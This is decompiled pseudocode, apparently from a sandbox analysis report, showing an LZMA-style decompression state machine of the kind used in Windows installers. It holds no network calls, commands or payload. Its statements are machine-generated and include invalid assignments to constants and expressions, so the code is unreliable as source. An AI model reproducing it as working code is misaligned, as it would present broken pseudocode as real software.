                                                                                                                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          								_t484 = _t644 - 0x70;
                                                                                                                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                          								goto L148;
                                                                                                                          							}
                                                                                                                          							L155:
                                                                                                                          							_t537 =  *(_t644 - 0x7c);
                                                                                                                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                          							while(1) {
                                                                                                                          								L140:
                                                                                                                          								 *(_t644 - 0x88) = _t537;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t538 =  *(_t644 - 0x88);
                                                                                                                          									if(_t538 > 0x1c) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									L2:
                                                                                                                          									switch( *((intOrPtr*)(_t538 * 4 +  &M0040684B))) {
                                                                                                                          										case 0:
                                                                                                                          											L3:
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L4:
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											_t538 =  *( *(_t644 - 0x70));
                                                                                                                          											if(_t538 > 0xe1) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											L5:
                                                                                                                          											_t542 = _t538 & 0x000000ff;
                                                                                                                          											_push(0x2d);
                                                                                                                          											asm("cdq");
                                                                                                                          											_pop(_t581);
                                                                                                                          											_push(9);
                                                                                                                          											_pop(_t582);
                                                                                                                          											_t638 = _t542 / _t581;
                                                                                                                          											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                          											asm("cdq");
                                                                                                                          											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                          											 *(_t644 - 0x3c) = _t633;
                                                                                                                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                          												L10:
                                                                                                                          												if(_t641 == 0) {
                                                                                                                          													L12:
                                                                                                                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													goto L11;
                                                                                                                          												}
                                                                                                                          												do {
                                                                                                                          													L11:
                                                                                                                          													_t641 = _t641 - 1;
                                                                                                                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                          												} while (_t641 != 0);
                                                                                                                          												goto L12;
                                                                                                                          											}
                                                                                                                          											L6:
                                                                                                                          											if( *(_t644 - 4) != 0) {
                                                                                                                          												GlobalFree( *(_t644 - 4));
                                                                                                                          											}
                                                                                                                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          											 *(_t644 - 4) = _t538;
                                                                                                                          											if(_t538 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                          												goto L10;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											L13:
                                                                                                                          											__eflags =  *(_t644 - 0x6c);
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												L157:
                                                                                                                          												 *(_t644 - 0x88) = 1;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L14:
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											_t45 = _t644 - 0x48;
                                                                                                                          											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                          											__eflags =  *_t45;
                                                                                                                          											L15:
                                                                                                                          											if( *(_t644 - 0x48) < 4) {
                                                                                                                          												goto L13;
                                                                                                                          											}
                                                                                                                          											L16:
                                                                                                                          											_t550 =  *(_t644 - 0x40);
                                                                                                                          											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                          												L20:
                                                                                                                          												 *(_t644 - 0x48) = 5;
                                                                                                                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											L17:
                                                                                                                          											 *(_t644 - 0x74) = _t550;
                                                                                                                          											if( *(_t644 - 8) != 0) {
                                                                                                                          												GlobalFree( *(_t644 - 8)); // executed
                                                                                                                          											}
                                                                                                                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                          											 *(_t644 - 8) = _t538;
                                                                                                                          											if(_t538 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												goto L20;
                                                                                                                          											}
                                                                                                                          										case 2:
                                                                                                                          											L24:
                                                                                                                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                          											 *(_t644 - 0x84) = 6;
                                                                                                                          											 *(_t644 - 0x4c) = _t557;
                                                                                                                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 3:
                                                                                                                          											L21:
                                                                                                                          											__eflags =  *(_t644 - 0x6c);
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												L158:
                                                                                                                          												 *(_t644 - 0x88) = 3;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L22:
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											_t67 = _t644 - 0x70;
                                                                                                                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											__eflags =  *_t67;
                                                                                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                          											L23:
                                                                                                                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                          											if( *(_t644 - 0x48) != 0) {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          											goto L24;
                                                                                                                          										case 4:
                                                                                                                          											L133:
                                                                                                                          											_t559 =  *_t642;
                                                                                                                          											_t626 = _t559 & 0x0000ffff;
                                                                                                                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                          											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                          												 *(_t644 - 0x40) = 1;
                                                                                                                          												_t560 = _t559 - (_t559 >> 5);
                                                                                                                          												__eflags = _t560;
                                                                                                                          												 *_t642 = _t560;
                                                                                                                          											} else {
                                                                                                                          												 *(_t644 - 0x10) = _t596;
                                                                                                                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                          											}
                                                                                                                          											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                          												goto L139;
                                                                                                                          											} else {
                                                                                                                          												goto L137;
                                                                                                                          											}
                                                                                                                          										case 5:
                                                                                                                          											L137:
                                                                                                                          											if( *(_t644 - 0x6c) == 0) {
                                                                                                                          												L168:
                                                                                                                          												 *(_t644 - 0x88) = 5;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L138:
                                                                                                                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                          											L139:
                                                                                                                          											_t537 =  *(_t644 - 0x84);
                                                                                                                          											L140:
                                                                                                                          											 *(_t644 - 0x88) = _t537;
                                                                                                                          											goto L1;
                                                                                                                          										case 6:
                                                                                                                          											L25:
                                                                                                                          											__edx = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L36:
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) = 1;
                                                                                                                          												 *(__ebp - 0x84) = 7;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											L26:
                                                                                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          											__esi =  *(__ebp - 0x60);
                                                                                                                          											__cl = 8;
                                                                                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          											__ecx =  *(__ebp - 0x3c);
                                                                                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											if( *(__ebp - 0x38) >= 4) {
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          													_t98 = __ebp - 0x38;
                                                                                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          													__eflags =  *_t98;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x38) = 0;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          											if( *(__ebp - 0x34) == __edx) {
                                                                                                                          												L35:
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												goto L61;
                                                                                                                          											} else {
                                                                                                                          												L32:
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 8);
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												goto L41;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											L66:
                                                                                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          											if( *(__ebp - 0x40) != 1) {
                                                                                                                          												L68:
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          												 *(__ebp - 0x80) = 0x16;
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L69;
                                                                                                                          											}
                                                                                                                          											L67:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											__ecx =  *(__ebp - 0x38);
                                                                                                                          											 *(__ebp - 0x84) = 8;
                                                                                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 8:
                                                                                                                          											L70:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xa;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x38);
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          												 *(__ebp - 0x84) = 9;
                                                                                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          											}
                                                                                                                          											goto L132;
                                                                                                                          										case 9:
                                                                                                                          											L73:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												goto L90;
                                                                                                                          											}
                                                                                                                          											L74:
                                                                                                                          											__eflags =  *(__ebp - 0x60);
                                                                                                                          											if( *(__ebp - 0x60) == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											L75:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          											__eflags = _t259;
                                                                                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                          											goto L76;
                                                                                                                          										case 0xa:
                                                                                                                          											L82:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L84:
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xb;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											L83:
                                                                                                                          											__eax =  *(__ebp - 0x28);
                                                                                                                          											goto L89;
                                                                                                                          										case 0xb:
                                                                                                                          											L85:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x20);
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x28);
                                                                                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          											L89:
                                                                                                                          											__ecx =  *(__ebp - 0x2c);
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          											L90:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x80) = 0x15;
                                                                                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          											goto L69;
                                                                                                                          										case 0xc:
                                                                                                                          											L99:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L164:
                                                                                                                          												 *(__ebp - 0x88) = 0xc;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L100:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t334 = __ebp - 0x70;
                                                                                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t334;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											goto L101;
                                                                                                                          										case 0xd:
                                                                                                                          											L37:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L159:
                                                                                                                          												 *(__ebp - 0x88) = 0xd;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L38:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t122 = __ebp - 0x70;
                                                                                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t122;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L39:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          												goto L48;
                                                                                                                          											}
                                                                                                                          											L40:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												goto L54;
                                                                                                                          											}
                                                                                                                          											L41:
                                                                                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          											 *(__ebp - 0x48) = __eax;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eax = __eax << 8;
                                                                                                                          											__eax = __eax + __ebx;
                                                                                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edx = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												 *(__ebp - 0x40) = 1;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__ebx = __ebx + __ebx + 1;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edx;
                                                                                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L39;
                                                                                                                          											} else {
                                                                                                                          												L45:
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											L46:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L160:
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L47:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t156 = __ebp - 0x70;
                                                                                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t156;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											while(1) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L49:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t170 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t170;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													L53:
                                                                                                                          													goto L46;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L54:
                                                                                                                          											_t173 = __ebp - 0x34;
                                                                                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          											__eflags =  *_t173;
                                                                                                                          											goto L55;
                                                                                                                          										case 0xf:
                                                                                                                          											L58:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L161:
                                                                                                                          												 *(__ebp - 0x88) = 0xf;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L59:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t203 = __ebp - 0x70;
                                                                                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t203;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L60:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												L55:
                                                                                                                          												__al =  *(__ebp - 0x44);
                                                                                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          											L61:
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__edx = __ebx + __ebx;
                                                                                                                          											__ecx =  *(__ebp - 0x10);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												_t217 = __edx + 1; // 0x1
                                                                                                                          												__ebx = _t217;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L60;
                                                                                                                          											} else {
                                                                                                                          												L65:
                                                                                                                          												goto L58;
